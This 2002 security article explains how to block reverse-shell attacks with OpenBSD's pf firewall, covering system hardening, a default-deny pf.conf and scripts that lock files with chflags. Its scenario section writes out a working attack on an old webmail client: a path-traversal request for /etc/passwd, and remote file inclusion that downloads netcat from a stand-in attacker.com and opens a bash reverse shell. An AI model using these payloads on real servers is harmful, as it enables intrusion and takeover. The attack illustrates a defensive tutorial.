Combating reverse telnet using OpenBSD Packet Filter (pf)
Author: Dr.T
Monday, 25 November 2002, 14:24 GMT

This article is meant for those who are going to implement a firewall using OpenBSD. Its main purpose is to protect servers (such as web, mail, DNS and others) within a firewalled network.

This article is based on my personal experience and I cannot guarantee it will suit every system you have. Feel free to email me any comments, feedback or other issues concerning this article. Co-operation from everybody is highly appreciated.

Credits:-
---------
Full credit to the software authors for their tools that were used in doing this research. Many thanks to the developers of OpenBSD for creating such a wonderful OS.

Theory:-
--------
If and only if you are familiar with reverse telnet, netcat, http-tunneling and the like, then this article is for you: to read, to think and to act in order to minimize successful intrusion attempts. (I strongly believe there is no technique that can stop intrusion 100% when you're connected to the Internet. IT security is a process, methodology and effort.)

Scenario
--------
The following are some examples to illustrate how a reverse telnet session can be used against you if your perimeter defenses are not at the optimum level. In the example, I will describe how illegal access is gained to a web server running the DragonFly Webmail client.

1) User input validation on an older version of the DragonFly Webmail client is a good introductory example.

In your web browser, typing certain strings and commands into the URL box can give you access to files on the server running the DragonFly Webmail client. Requesting a URL like

http://victim.com/index.php?langc=../../../../../../etc/passwd

would display the password file from the server. Bad? The worst is yet to come. The attacker can simply implant or upload backdoor programs such as NetCat to get an interactive shell on the server.

What will the attacker do? Here's what. He would need to run a web server and host a file on it (let's say cmd.txt). To do reverse telnet using NetCat, the attacker needs to upload NetCat to the victim server, and he can do that by running two commands through the web browser.

http://victim.com/index.php?langc=http://attacker.com/cmd.txt&cmd=wget%20-O%20/tmp/nc%20http://attacker.com/nc
http://victim.com/index.php?langc=http://attacker.com/cmd.txt&cmd=chmod%20755%20/tmp/nc

Then the attacker uses NetCat on his web server to listen for an incoming connection on a certain port, let's say port 25.
#nc -vv -l -p 25

The next step is for the attacker to use NetCat on the victim server to connect back to the attacker's machine. To get an interactive shell, the attacker simply issues a command through the web browser telling the victim server to connect to his box.

http://victim.com/index.php?langc=http://attacker.com/cmd.txt&cmd=/tmp/nc%20-vv%20attacker.com%2025%20-e%20/bin/bash

That's it. The attacker gets an interactive shell on the victim's server and can do what he likes with it.

This is one of the scenarios that may happen to your server if your firewall configuration allows outbound connections to any IP on the Internet. I would say a good firewall should have a firm configuration and not allow connections or access needlessly. A strict perimeter defense minimizes the chances of an attacker doing further damage to your network. Nowadays a firewall alone is not sufficient: firewalls, IDSs and a good security team together make a good defense against never-ending cyber threats.

Solution:-
----------
To negate such attacks using reverse telnet techniques, you can take several measures. I would recommend OpenBSD if you are looking for a robust OS with strong security features. Installing OpenBSD is simple and straightforward. If you have any problems installing or using it, plenty of help and FAQs can be found at http://www.openbsd.org/faq.html

For a start, this is how to install an OpenBSD box.

Preparing your OpenBSD box

1) partition
/ 25% (must be less than 8 GB if you have a larger hard disk)
swap: double your memory
/tmp 5%
/usr 30%
/var 40% (for logging purpose)

2) services

Disable all services except ssh for remote maintenance: take a look at /etc/rc.conf and set INETD and SENDMAIL to NO and pf to YES

3) file system

edit your /etc/fstab
/dev/wd0a / ffs rw 1 1
/dev/wd0d /tmp ffs rw,nodev,nosuid,noexec 1 2
/dev/wd0e /usr ffs rw,nodev 1 2
/dev/wd0f /var ffs rw,nodev,nosuid,noexec 1 2

4) update your OpenBSD sources

get src.tar.gz and srcsys.tar.gz for your OpenBSD version from ftp.openbsd.org and untar them into /usr/src
tips: I would use cvsup rather than cvs because of its speed; for more information on how to set up a cvsup client please refer to www.openbsd.org/anoncvs.html. After updating the sources, you have to rebuild the binaries for your box, which can be done with
#cd /usr/src && rm -rf /usr/obj && make obj && make build

5) recompile kernel

for better performance add these lines (config(8) option syntax) to the end of /usr/src/sys/arch/i386/conf/GENERIC

option NMBCLUSTERS=10240
option MAX_KMAP=200
option MAX_KMAPENT=8000
option NBUF=16384

#cd /usr/src/sys/arch/i386/conf/ && config GENERIC && cd ../compile/GENERIC && make depend && make

then back up your running kernel and install the new one:

#mv /bsd /bsd.old
#cp /usr/src/sys/arch/i386/compile/GENERIC/bsd /
#chown root:wheel /bsd

6) editing firewall rules

Sample /etc/pf.conf for restricting access to all servers (please edit to suit your needs)

---cut here ---
MAIL="" #IP of the mail server
DNSSERV="" #IP of the host offering DNS service
DNSCLI="" #IP of the DNS server used by clients (and by this firewall)
HTTP="" #IP of the web server
HTTPS="" #IP of the SSL-enabled web server
SPOOF="" #prevent IP spoofing (in/out), eg {10.0.0.0/8, 172.16.0.0/16}
BLACKLIST="" #eg IP of netcraft.net
EXTIF="" #external interface of the firewall, eg fxp0
INTIF="" #internal interface of the firewall, eg fxp1
TRUST="" #trusted clients for monitoring services / remote management
SSHSERV="" #servers with sshd enabled, format SSHSERV="{ip,ip,ip}", for remote monitoring
MONITOR="" #IP of the monitoring host
#scrubbing all packets
scrub in all

#default rules: DENY all, don't trust any user input
#blocking inbound and outbound packets on the external interface
#nothing behind the firewall (web, mail and dns servers included) may open an
#outbound connection unless a pass out rule below allows it; this is what stops
#an uploaded /tmp/nc from connecting back out, and the attempt is logged on pflog0
block in log all
block out log on $EXTIF from any to any

#pass inbound and outbound on the loopback and internal interfaces
pass in quick on lo0 all
pass out quick on lo0 all
pass in quick on $INTIF all
pass out quick on $INTIF all

#pass outbound from TRUSTED HOSTS (LAN?) and keep state
pass out quick on $EXTIF inet proto {tcp,udp} from $TRUST to any keep state

#we can't tolerate any port scanning performed against this network,
#nor ip spoofing
block in quick on $EXTIF inet proto tcp from any to any flags FUP/FUP
block in quick on $EXTIF inet proto {tcp,udp} from $SPOOF to any
block out quick on $EXTIF inet proto {tcp,udp} from any to $SPOOF

#blocking all inbound packets from unwanted sites (ie netcraft)
block in log quick on $EXTIF inet proto {tcp,udp} from $BLACKLIST to any

#allowing this host to resolve hostnames: dns requests only to the specific dns server
pass out on $EXTIF inet proto {tcp,udp} from any to $DNSCLI port = domain keep state

#allowing web services (flags only apply to tcp, so these rules are tcp only)
pass in log quick on $EXTIF inet proto tcp from any to $HTTP port = http flags S/SA keep state
pass in log quick on $EXTIF inet proto tcp from any to $HTTPS port = https flags S/SA keep state

#allowing remote monitoring over a secure channel (SSH)
pass in log quick on $EXTIF inet proto tcp from $MONITOR to $SSHSERV port = 22 flags S/SA keep state

#allowing DNS service (udp and tcp)
pass in log quick on $EXTIF inet proto {tcp,udp} from any to $DNSSERV port = domain keep state
pass out log quick on $EXTIF inet proto {tcp,udp} from $DNSSERV to any port = domain keep state

#allowing the mail relay to receive and send email
pass in log quick on $EXTIF inet proto tcp from any to $MAIL port = smtp flags S/SA keep state
pass out log quick on $EXTIF inet proto tcp from $MAIL to any port = smtp keep state

7) locking the file system and hardening

I used to lock my file system so that it can't be backdoored. To undo this for upgrading system sources you must boot to single user (at the boot prompt type boot -s): the schg flag can only be cleared at securelevel 0, and OpenBSD runs at securelevel 1 once it is in multi-user mode.

Script to lock the file system
---cut here ----
#!/bin/sh
# on.sh: set the system-immutable flag on the binaries, kernel and
# configuration; the list is a plain space-separated string so that the
# for loop below sees each directory as its own word
LOCKING_FILE_SYSTEM="/bin /sbin /usr /bsd /etc"
for d in $LOCKING_FILE_SYSTEM; do
/usr/bin/chflags -R schg $d
done
echo "Finished locking sensitive filesystem"
echo "to unlock this file system for performing system updates, reboot to single user and run off.sh"

--- cut here ----

Script to unlock the file system (make sure you have already remounted / read-write and mounted the other partitions)
#mount -uw / && mount /tmp && mount /usr && mount /var
--- cut here ----
#!/bin/sh
# off.sh: clear the system-immutable flag again (only works at securelevel 0,
# ie in single-user mode)
LOCKING_FILE_SYSTEM="/bin /sbin /usr /bsd /etc"
for d in $LOCKING_FILE_SYSTEM; do
/usr/bin/chflags -R noschg $d
done
echo "Finished unlocking sensitive filesystem"
echo "press CTRL+D to continue booting your box"

Conclusion:-
The more applications you choose to run, the more you put your network in danger.

regards,
wanvadder
flyguy

Greetings:-

SCAN Clan (tynon,sk,pokleyzz,wyse,semit,sponfork,flyguy,s0cket370), kopisusu, eLcc, OOK and #mylinux on dalnet
http://www.scan-associates.net
